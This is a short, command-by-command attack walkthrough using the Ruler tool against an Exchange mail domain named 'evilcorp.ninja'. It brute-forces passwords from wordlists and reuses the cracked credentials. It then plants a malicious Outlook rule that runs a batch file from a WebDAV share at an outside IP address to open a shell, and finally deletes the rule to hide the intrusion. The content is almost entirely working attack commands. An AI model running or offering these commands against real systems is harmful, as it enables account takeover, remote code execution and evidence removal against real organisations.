The attack:

BRUTEFORCE

./ruler -domain evilcorp.ninja -brute -usernames ~/users.txt -passwords ~.passwords.txt -delay 0 -v –insecure

 

USE CREDENTIALS TO CHECK IF MAPI IS ENABLED

./ruler -domain evilcorp.ninja –user john.ford –pass August2016 –email john.ford@evilcorp.ninja -check –insecure

 

EXAMINE EXISTING RULES

./ruler –domain evilcorp.ninja –user john.ford –pass August2016 –email john.ford@evilcorp.ninja –insecure –display

 

 

CREATE A RULE!!!!!

./ruler –domain evilcorp.ninja –user john.ford –pass August2016 –email john.ford@evilcorp.ninja –insecure –loc \\\\154.0.165.46\\webdav\\pop.bat –rule popper –trigger pop

 

 

 

 

 

 

 

POP A SHELL

 

DELETE THE RULE

./ruler –domain evilcorp.ninja –user john.ford –pass August2016 –email john.ford@evilcorp.ninja –insecure –loc \\\\154.0.165.46\\webdav\\pop.bat –insecure –delete 010000001ada59d3

 

 

 

As if we were never there J